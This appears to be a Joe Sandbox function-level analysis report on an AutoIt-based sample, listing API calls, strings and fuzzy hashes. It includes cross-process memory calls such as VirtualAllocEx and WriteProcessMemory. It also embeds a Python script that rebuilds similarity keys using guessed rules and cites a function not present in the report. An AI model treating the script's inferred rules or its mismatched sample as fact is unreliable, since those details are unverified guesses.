                                                            • Instruction ID: c84769c0d7fa6587ca0c00cdc7161cb083123352c7492ab80a305a3a5e031a83
                                                            • Opcode Fuzzy Hash: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
                                                            • Instruction Fuzzy Hash: 27A13BB1104205AFD701EF54C891EABB7ECEF99358F00892DF1959B1A2DB71EA09CB52
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 00367A51: _memmove.LIBCMT ref: 00367AAB
                                                            • __swprintf.LIBCMT ref: 00372ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00372D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: c722f67bccddbef32f2ecfb8c83f7007ff4ded6488b6f0c178a703ffde64b9db
                                                            • Instruction ID: c5fae3a565d101d6bad38709f6a30271984b243a52bd922dc7f8591e1bbcc26b
                                                            • Opcode Fuzzy Hash: c722f67bccddbef32f2ecfb8c83f7007ff4ded6488b6f0c178a703ffde64b9db
                                                            • Instruction Fuzzy Hash: 73914B711082019FC726EF24C896C6FB7E8EF96710F04891DF4969B2A5EB34ED44CB62
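The "API ID" printed under each Similarity block above is a key derived purely from that function's "APIs" list, which is what lets two functions be matched across reports even when their addresses and fuzzy hashes differ. The Python below, an added example that is not part of the Joe Sandbox report or of the Joe Sandbox IDA Plugin, parses "APIs" bullets exactly as they are printed here (including the "Part of subcall function" lines, which are counted too) and rebuilds that key. The word rules it applies are inferred from the entries on this page and are assumptions, not a documented algorithm: names are split at camel-case boundaries, a word is dropped if it has fewer than four letters or no lowercase letter (so Get, Co, Dlg, W, ID and CLSID vanish while Wait, __itow, __87except and std::exception::exception survive), words are grouped by how often they occur, each group is sorted in ASCII order, and groups are joined with "$". The two sample entries embedded in the block are copied from the GetTokenInformation and __swprintf functions listed above.

```python
"""Rebuild the Joe Sandbox "API ID" similarity key from a function's "APIs" list.

Added example, not part of the Joe Sandbox report or its IDA plugin.  The
tokenisation rules are inferred from the entries on this page (assumption):
the real plugin may behave differently on names not represented here.
"""
import re
from collections import Counter

# One "APIs" bullet as printed in the report, bullet character already removed:
#   GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
#   Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
_API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

# Camel-case splitter: either a run of capitals not followed by a lowercase
# letter (CLSID, ID, the trailing W of lstrcmpiW) or an optional capital plus
# everything up to the next capital (Get, __start, Exception@8, _memmove).
_TOKEN = re.compile(r"[A-Z]+(?![a-z])|[A-Z]?[^A-Z]+")


def parse_api_line(line: str) -> dict:
    """Split one "APIs" bullet into name, module, argument list, call site."""
    text = line.strip().lstrip("•").strip()
    m = _API_LINE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    d = m.groupdict()
    d["args"] = d["args"].split(",") if d["args"] is not None else []
    d["subcall"] = d["caller"] is not None
    return d


def tokens(api_name: str) -> list:
    """Words of an API name that contribute to the key.

    Inferred rule (assumption): keep a word only if it contains a lowercase
    letter and has at least four letters once non-letters are ignored.
    """
    kept = []
    for tok in _TOKEN.findall(api_name):
        letters = re.sub(r"[^A-Za-z]", "", tok)
        if len(letters) >= 4 and any(c.islower() for c in tok):
            kept.append(tok)
    return kept


def api_id(api_lines: list) -> str:
    """Words grouped by descending occurrence count, ASCII-sorted within a
    group, groups joined with "$" (the format seen in the report)."""
    counts = Counter()
    for line in api_lines:
        counts.update(tokens(parse_api_line(line)["name"]))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Two entries copied verbatim from this report, used as a self-check.
TOKEN_ENTRY = [
    "• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121",
    "• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B",
    "• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A",
    "• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141",
    "• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157",
]
SWPRINTF_ENTRY = [
    "• Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC",
    "• Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01",
    "• Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22",
    "• Part of subcall function 00367A51: _memmove.LIBCMT ref: 00367AAB",
    "• __swprintf.LIBCMT ref: 00372ECD",
]

if __name__ == "__main__":
    print(api_id(TOKEN_ENTRY))     # HeapInformationToken$AllocErrorLastProcess
    print(api_id(SWPRINTF_ENTRY))  # _memmove$Exception@8Throw__swprintfstd::exception::exception
```

The key is deliberately coarse: it ignores modules, argument values and call order, so functions that differ only in which wrapper they call will collide, and a sample can change it simply by calling one extra API. Treat it as a bucket for candidate matches and confirm with the opcode or instruction fuzzy hashes that the report prints beside it.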
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • CoInitialize.OLE32(00000000), ref: 003CB9BB
                                                            • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CB9D4
                                                            • CoUninitialize.OLE32 ref: 003CB9F1
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                            • Instruction ID: 52442a5187f0c9064384edc8981866e4759ddbd522276359683a9c671f8822ec
                                                            • Opcode Fuzzy Hash: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                            • Instruction Fuzzy Hash: 91A153756042059FCB02DF14C885E6ABBE9FF89314F05899DF8999B3A2CB31EC45CB91
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 003BB4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%?
                                                            • API String ID: 3565006973-1141368171
                                                            • Opcode ID: 099b541aa7f4c765c8843ab4d99c2edb7dda0d844c0592879d63a7eaeda09614
                                                            • Instruction ID: 3b7ecbe60d3ceba10490633bc9dace6c25e3e331ebd2bf94a43c3b36a7a401f9
                                                            • Opcode Fuzzy Hash: 099b541aa7f4c765c8843ab4d99c2edb7dda0d844c0592879d63a7eaeda09614
                                                            • Instruction Fuzzy Hash: 37915D706006019FDB25DF64C884BAAB7F9FF49714F10856EFA4ACB691DBB0E845CB50
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 003850AD
                                                              • Part of subcall function 003900F0: __87except.LIBCMT ref: 0039012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                            • Instruction ID: d1310af86ccc8edf35f1cb9d3bfe593d392d87145e4919a1a835a9c86e09be13
                                                            • Opcode Fuzzy Hash: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                            • Instruction Fuzzy Hash: D9516DA590C7028ADF1B7B28CD4537E3BA89B40700F218DD9E4D58A2A9DF348DD4DB86
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3c7$_7
                                                            • API String ID: 4104443479-4188345352
                                                            • Opcode ID: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                            • Instruction ID: a38e27e558d97082891e8bdddb7d811c8dfc8a9dfd22c95de50022ca9dc5f7a7
                                                            • Opcode Fuzzy Hash: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                            • Instruction Fuzzy Hash: 21518D70D00609DFCB26CF68C884AAEBBB1FF46304F158529E85AE7650EB30A955CF51
                                                            APIs
                                                              • Part of subcall function 003C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B9296,?,?,00000034,00000800,?,00000034), ref: 003C14E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003B983F
                                                              • Part of subcall function 003C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003C14B1
                                                              • Part of subcall function 003C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003C1409
                                                              • Part of subcall function 003C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C1419
                                                              • Part of subcall function 003C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                            • Instruction ID: 8fc99c374fd8045e18211fe96fef7031ad4f7338a21c27b041e13541089314d0
                                                            • Opcode Fuzzy Hash: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                            • Instruction Fuzzy Hash: C3413076900118BFDB15DFA4CC85FDEBBB8EB09300F004199FA45BB191DA716E45DBA0
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EF910,00000000,?,?,?,?), ref: 003E79DF
                                                            • GetWindowLongW.USER32 ref: 003E79FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E7A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                            • Instruction ID: 62ff8cd1a161ac8653f54bfada8214142949df2c7dccc6e7e53ddc963a16d6da
                                                            • Opcode Fuzzy Hash: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                            • Instruction Fuzzy Hash: 3D31FC3120465AAFDB228E39CC41BEB77A9EF49324F218725F875A72E1D730EC508B50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003E7461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003E7475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E7499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                            • Instruction ID: d8fa18e74133994fdb98ea3895a8cfb5e8d4aecfa3decc62c6f3407bb906be4c
                                                            • Opcode Fuzzy Hash: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                            • Instruction Fuzzy Hash: 95219132500268AFDF228E55CC46FEA3B69EF48724F110214FE156B1D0DAB5AC919BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003E7C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003E7C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003E7C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                            • Instruction ID: 4f60e0127528c0729cdc4ea582ea03d11262ccb97b9a31a321b5ee64840913ef
                                                            • Opcode Fuzzy Hash: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                            • Instruction Fuzzy Hash: B7219CB1204259AFDB22DF24DCC1DA737ACEB4A394B150159F9019B3A1CB71EC118A60
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E6D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E6D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E6D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                            • Instruction ID: c25ae76c78a5fcaebe6fcf98afad806ea5246afbb54ed5bff4b31b840ae7ec97
                                                            • Opcode Fuzzy Hash: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                            • Instruction Fuzzy Hash: 66218332600168BFDF228F55CC45FBB37AAEF997A0F518224F9455B1D1C6719C5187A0
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 003D3A66
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$%?
                                                            • API String ID: 3506404897-1727123861
                                                            • Opcode ID: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                            • Instruction ID: b3d51eee7e8d1ccd8fee0688ad858e30f9e03d16d84bf90d6310dd3799062ab9
                                                            • Opcode Fuzzy Hash: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                            • Instruction Fuzzy Hash: 6C219372B00219AFCF12EF64DC82AEE77B5AF44300F50445AF545AB286DB74EE41CB66
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003E7772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003E7787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003E7794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                            • Instruction ID: 83c3e37bded4ad23f741d3ee9c85be24492b3b7552a1d423e608d1af19ab3036
                                                            • Opcode Fuzzy Hash: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                            • Instruction Fuzzy Hash: BE113A72244248BFEF215F61CC01FE7776CEF89B54F124228F641A60D0C272E851CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: A$@BB
                                                            • API String ID: 3494438863-782587721
                                                            • Opcode ID: c4017c12f4d4e618c95e1431312ed6273fdb10ad8f748a1a6a77210f19d68cd4
                                                            • Instruction ID: bc02692332c5bc6255f6f44652f87d09d2bfbfe4fef34e0322f75b65a7704740
                                                            • Opcode Fuzzy Hash: c4017c12f4d4e618c95e1431312ed6273fdb10ad8f748a1a6a77210f19d68cd4
                                                            • Instruction Fuzzy Hash: 3FF0A475304712CBE737AF16BC52AA22795E700338F9000A6E500CE1C0EB3488824B98
                                                            APIs
                                                            • __lock.LIBCMT ref: 00389B94
                                                              • Part of subcall function 00389C0B: __mtinitlocknum.LIBCMT ref: 00389C1D
                                                              • Part of subcall function 00389C0B: EnterCriticalSection.KERNEL32(00000000,?,00389A7C,0000000D), ref: 00389C36
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00389BA4
                                                              • Part of subcall function 00389100: ___addlocaleref.LIBCMT ref: 0038911C
                                                              • Part of subcall function 00389100: ___removelocaleref.LIBCMT ref: 00389127
                                                              • Part of subcall function 00389100: ___freetlocinfo.LIBCMT ref: 0038913B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                            • String ID: 8A$8A
                                                            • API String ID: 547918592-441909865
                                                            • Opcode ID: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                            • Instruction ID: 8306589bb07c6e58d7d099d9fb76362ef3b2cff88125ea0e9f969e2f0af86406
                                                            • Opcode Fuzzy Hash: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                            • Instruction Fuzzy Hash: CBE0863954B300A5D613F7A5AA077A866505B00B21F6441DBF445590C1CE781540871F
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364B83,?), ref: 00364C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00364C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
